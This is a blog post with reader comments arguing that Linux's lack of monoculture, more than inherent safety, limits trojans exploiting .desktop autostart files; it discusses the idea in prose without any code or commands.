On Linux viruses
Some guy from New Zealand blogged about a vulnerability in .desktop files as used by Gnome and KDE, and claims you can write a virus with them for Linux. He actually meant a Trojan rather than a virus, but still.
I'm not saying the vulnerability does not exist. It does, and the trojan he describes should work in theory.
However, in practice, I believe that the real reason why there aren't any Linux viruses is not the fact that Linux is somehow 'safer', but really the fact that Linux isn't a monoculture like Windows is.
If you want to write a Windows virus, you have to deal with, at most, four to five different versions of windows that are currently still in active use with most users. Target that, and your virus will live like there's no tomorrow.
If you want to write a Linux virus, the range of target system is much, much larger. In his very blog entry that describes the vulnerability, 'foobar' describes already two special cases he has to consider: the fact that KDE and Gnome write .desktop entries that get executed on startup to different locations, and the fact that, while most distributions ship either curl or wget, none of them has standardized on either of those, requiring the virus writer to account for that, too.
While his blog entry stops at that, there's way, way more he has to deal with. If our supposed trojan writer wants his trojan to proliferate, he will have to deal with distributions that come with or without SE Linux; distributions that ship with a /tmp mounted noexec; distributions that ship with python 2.3, 2.4, 2.5, or 3.0; users who use Thunderbird, Evolution, Kmail, mutt, pine, or another mail client; and possibly much, much more (this only describes what's required as described in the referenced blog post). All these differences would make writing some malware that would exploit the described vulnerability tedious, at best, and rather impractical in most cases.
Again, I'm not saying the vulnerability does not exist; it does. But I think this lack of monoculture under Linux, not the (perceived) strength of the platform, is what helps users defend against malware on Linux.
So, my train of thought went like this:
These same problems make shipping binary software hard in general, not just for viruses.
We don't care, because people shouldn't ship binaries, they should ship source code and let distributions compile it.
Wait, couldn't a virus just ship C source code and assume GCC? Many distributions come with a compiler by default.
/bin/sh is available on 99.9% linux systems. /usr/bin/perl is available on 100% (Essential=yes). libwww-perl's popcon is 63% of installed systems and it is a dependency of Gnome. Also, it is installed on 97% ubuntu popcon. Linux isn't mono-culture, but it does rely on lots of standards (POSIX, LSB, freedesktop...)
Implementing a fall back mechanisms to for wget->curl->GET is trivial.
=> Pretending that [Linux|Mac|Windows|FoobarOS] don't need a protection against malwares is like saying that one don't needs shoes: not matter how carefully you are walking, some day you'll walk on a pin, or a scorpion will sting you. (And worse, one may not notice it).
So far so good